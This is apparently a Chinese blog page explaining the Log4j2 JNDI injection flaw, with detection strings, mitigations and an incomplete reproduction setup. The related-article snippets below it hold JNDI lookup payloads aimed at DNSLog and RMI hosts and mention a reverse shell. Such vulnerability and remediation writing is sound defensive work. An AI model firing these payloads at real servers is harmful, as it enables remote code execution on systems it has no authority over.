log4j关于JNDI注入漏洞验证及修复

Log4j2 JNDI注入漏洞详解与修复指南
最新推荐文章于 2025-09-18 20:42:49 发布
原创 最新推荐文章于 2025-09-18 20:42:49 发布 · 8.2k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #apache #服务器 #log4j #log4j2

本文详细介绍了Apache Log4j2的JNDI注入漏洞,包括漏洞原理、检测方案、影响范围和组件。提供彻底解决方案,如升级至log4j-2.15.0-rc2,并给出临时缓解措施,如设置系统变量。同时,演示了漏洞复现步骤和本地编译log4j-2.15.0-rc版本的方法。

log4j关于JNDI注入漏洞验证及修复

一、漏洞说明

漏洞原理官方表述:Apache Log4j2 中存在JNDI注入漏洞,当程序将用户输入的数据进行日志记录时,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。

通俗简单的说就是:在打印日志的时候,如果你的日志内容中包含关键词 ${,攻击者就能将关键字所包含的内容当作变量来替换成任何攻击命令,并且执行。

二、漏洞检测方案

1、通过流量监测设备监控是否有相关 DNSLog 域名的请求
2、通过监测相关日志中是否存在“jndi:ldap://”、“jndi:rmi”等字符来发现可能的攻击行为。

三、影响范围

Apache log4j2 >= 2.0, <= 2.14.1

四、影响组件

Apache Struts2
Apache Solr
Apache Druid
Apache Flink
Apache Flume
Apache Dubbo
Apache Kafka
Sping-boot-strater-loj2
ElasticSearch
Redis
Logstash

五、彻底解决方案(附升级包下载地址)

目前rc1版本已被绕过,建议使用如下官方临时补丁进行修复,升级至log4j-2.15.0-rc2;

升级包下载log4j-2.15.0-rc2.zip

六、临时缓解方案

1、 禁止没有必要的业务访问外网。
2、设置jvm参数

“-Dlog4j2.formatMsgNoLookups=true”

3、设置

“log4j2.formatMsgNoLookups=True”

4、系统环境变量

“FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS”设置为“true”

七、漏洞复现

1、新建maven工程
2、pom文件内容如下

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>
    <groupId>org.example</groupId>
    <artifactId>log4j-test</artifactId>
    <version>1.0-SNAPSHOT</version>

    <properties>
        <maven.compiler.source>1.8</maven.compiler.source>
        <maven.compiler.target>1.8</maven.compiler.target>
        <log4j.version>2.14.1</log4j.version>
    </properties>

    <dependencies>

        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>${log4j.version}</version>
            <scope>
最低0.47元/天 解锁文章
JNDI-Injection-Exploit:JNDI注入测试工具(生成JNDI链接的工具可以启动多个服务器来利用JNDI Injection漏洞,例如Jackson,Fastjson等)
05-07
JNDI注入漏洞 描述 JNDI-Injection-Exploit是用于生成可用的JNDI链接并通过启动RMI服务器,LDAP服务器和HTTP服务器来提供后台服务的工具。 RMI服务器和LDAP服务器基于并进行了进一步修改以与HTTP服务器链接。 使用此工具可以获取JNDI链接,可以将这些链接插入POC以测试漏洞。 例如,这是一个Fastjson vul-poc: { " @type " : " com.sun.rowset.JdbcRowSetImpl " , " dataSourceName " : " rmi://127.0.0.1:1099/Object " , " autoCommit " : true } 我们可以用JNDI-Injection-Exploit生成的链接替换“ rmi://127.0.0.1:1099 / Object”,以测试漏洞。 免责声明 所有信
Log4j 漏洞修复检测 附检测工具
热门推荐
cnsre运维博客
12-13 1万+
作者:SRE运维博客 博客地址:https://www.cnsre.cn/ 文章地址:https://www.cnsre.cn/posts/211213210004/ 相关话题:https://www.cnsre.cn/tags/Log4j/ 近日的Log4j2,可是非常的火啊,我也是加班加点把补丁给打上了次安心。Apache Log4j2存在远程代码执行漏洞,经验证,该漏洞允许攻击者在目标服务器上执行任意代码,可导致服务器被黑客控制。由于Apache Log4j 2应用较为广泛,建议使用该组件的用..
安全漏洞(1)-Log4j2远程代码执行漏洞log4j2漏洞验证
迷途的小兵
12-13 1万+
Log4j2远程代码执行漏洞log4j2漏洞验证
JNDI注入
最新发布
rasssel的博客
09-18 710
结论:阻断远程 classloading、禁止 codebase 可信、或避免从不可信来源构造 Reference 就能从根本上消减风险。
Apache Log4j 漏洞验证
柳似烟的专栏
12-15 3653
首先下载JNDI-Injection-Exploit,该jar包实现RMI、LDAP服务功能,对外提供服务,且包含用于执行攻击命令的ExecTemplateJDK7.class和ExecTemplateJDK8.class模版文件。 下载包含漏洞版本的log4j的jar包 使用如下3个jar包文件 添加上面3个jar包到工程: 编写测试代码: import org.apache.log4j.Logger; public class Log4jDemo { /** ..
Log4j 漏洞测试
2401_84091321的博客
04-07 448
资料过多,篇幅有限,需要文中全部资料可以点击这里获取前端面试资料PDF完整版!自古成功在尝试。不尝试永远都不会成功。勇敢的尝试是成功的一半。64934690)][外链图片转存中…(img-l4JiRPXK-1712464934690)]资料过多,篇幅有限,需要文中全部资料可以点击这里获取前端面试资料PDF完整版!自古成功在尝试。不尝试永远都不会成功。勇敢的尝试是成功的一半。
Log4j2漏洞(一)原理和dnslog验证
02-06 2693
Log4j2漏洞(一)介绍漏洞前景、漏洞原理、确定注入点和dnslog验证
Log4j2日志框架JNDI注入漏洞分析与复现
两米以下皆凡人的博客
12-14 5622
1、漏洞背景 大家在实际开发中,几乎无可避免的需要用到日志框架,不管你是前端后端客户端,他们可以追踪和记录我们的程序运行中的信息,我们可以利用日志很快定位问题,追踪分析。 而对于Java开发人员来说,最常用的日志框架便是Log4j2和logback,而本次漏洞的主角便是Apache Log4j2,它有一个特别强大的功能插件Lookups 如果我们试图通过日志去输出一个程序中不存在的对象,而在其他地方,那么我们便可以通过这个插件去通过某些方式去查找目标内容,它只提供一种规范,具体使用哪些方式去查找
核弹级漏洞深度解析:Log4j2 JNDI注入攻击原理与防御实战
专注于 Java 后端架构、微服务、分布式、前端及 AI 领域的技术分享,是开发者获取硬核知识、交流实战经验的专业博客。
06-06 1501
Log4j2 JNDI注入漏洞是近年来最严重的Java安全事件之一,其影响范围之广、危害之大警示我们:技术创新与安全防护必须同步推进。通过升级组件、限制功能、强化监控等多维度防御策略,结合安全开发实践,可有效降低类似漏洞的风险。未来,随着云原生和微服务架构的普及,持续关注开源组件安全将成为企业数字化转型的必修课。参考链接Apache Log4j2官方文档JNDI注入漏洞深度分析Marshalsec工具指南。
Log4j2JNDI注入漏洞原理分析与思考
uuuyy_的博客
12-23 2975
前言 最近Log4j2JNDI注入漏洞(CVE-2021-44228)可以称之为“核弹”级别。Log4j2作为类似JDK级别的基础类库,几乎没人能够幸免。极盾科技技术总监对该漏洞进行复现和分析其形成原理。在此分享。 以下涉及的代码,均在mac OS 10.14.5,JDK1.8.0_91环境下成功运行。 一、 前置知识 1.1 Log4j2 Log4j2是一个Java日志组件,被各类Java框架广泛地使用。它的前身是Log4jLog4j2重新构建和设计了框架,可以认为两者是完全独立的两个日志组
Apache Log4j2 lookup JNDI 注入漏洞复现(CVE-2021-44228)
qq_51331767的博客
04-02 830
在其2.0到2.14.1版本中存在一处JNDI注入漏洞log4j的默认配置允许使用解析日志消息中的对象。攻击者可以构造恶意的日志消息,其中包含一个恶意的Java对象,当log4j尝试解析这个对象时,它将会触发漏洞,导致攻击者能够执行任意代码。通过DNSLog平台(http://www.dnslog.cn/)获取到域名http://xxxxxx,构造payload ${jndi:ldap://http://xxxxxx}这里IP是kali的IP,端口是你等会nc监听的端口。JNDI注入反弹shell。
如何判断系统是否使用 Log4j,并检测漏洞的存在?
Aishenyanying33的博客
11-25 2337
如何判断系统是否使用 Log4j,并检测漏洞的存在?
【实战】一次简单的log4j漏洞测试
crowsec
12-19 4545
【实战】一次简单的log4j漏洞测试
Log4j 远程代码执行漏洞检测
LiBai'S BLOG
12-14 1万+
Log4j 远程代码执行漏洞检测~
log4j RCE漏洞原理分析及检测_log4j 漏洞监测(1),【一步教学,一步到位
weixin_58085973的博客
04-18 787
漏洞检测时,可以使用 ${jndi:ldap://http://xxx.dnslog.cn} ,如果攻击成功,目标服务器将会从 xxx.dnslog.cn 下载jndi字节流,下载之前首先得连接dnslog.cn进行xxx.dnslog.cn的域名解析,获得真实ip地址。因此,如果攻击者能够控制日志打印的内容,就可以使目标服务器从攻击者指定的任意url地址下载代码字节流,攻击者在字节流中附带的代码就会在目标服务器上执行。攻击检测后,如果发现 dnslog.cn 中刷新到了dns解析记录,就表示探测成功。
JNDI注入的理解、JDK给出的修复
qq_37432174的博客
11-24 807
攻击目标扮演的相当于是JNDI客户端的角色,攻击者通过搭建一个恶意的RMI服务端来实施攻击。Context.PROVIDER_URL参数表示指定一个远程加载的地址,例如上面的rmi://127.0.0.1:8080,当我们通过lookup函数进行查找对象的时候,其实就是在rmi://127.0.0.1:1099/m1sn0w这个里面进行的查找。当然,如果受害者内部存在漏洞组件存在反序列化漏洞的话,我们可以构造恶意的序列化对象,返回给客户端,当客户端在进行反序列化的时候,可以触发漏洞
2024年【软件测试】探索和学习SDLC与软件测试的关系,顺利通过阿里软件测试岗面试
2401_84563734的博客
05-08 966
Testing is part of every stage in modern SDLC models. (整合:在现代SDLC模型的每个阶段,测试都是一个组成部分。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值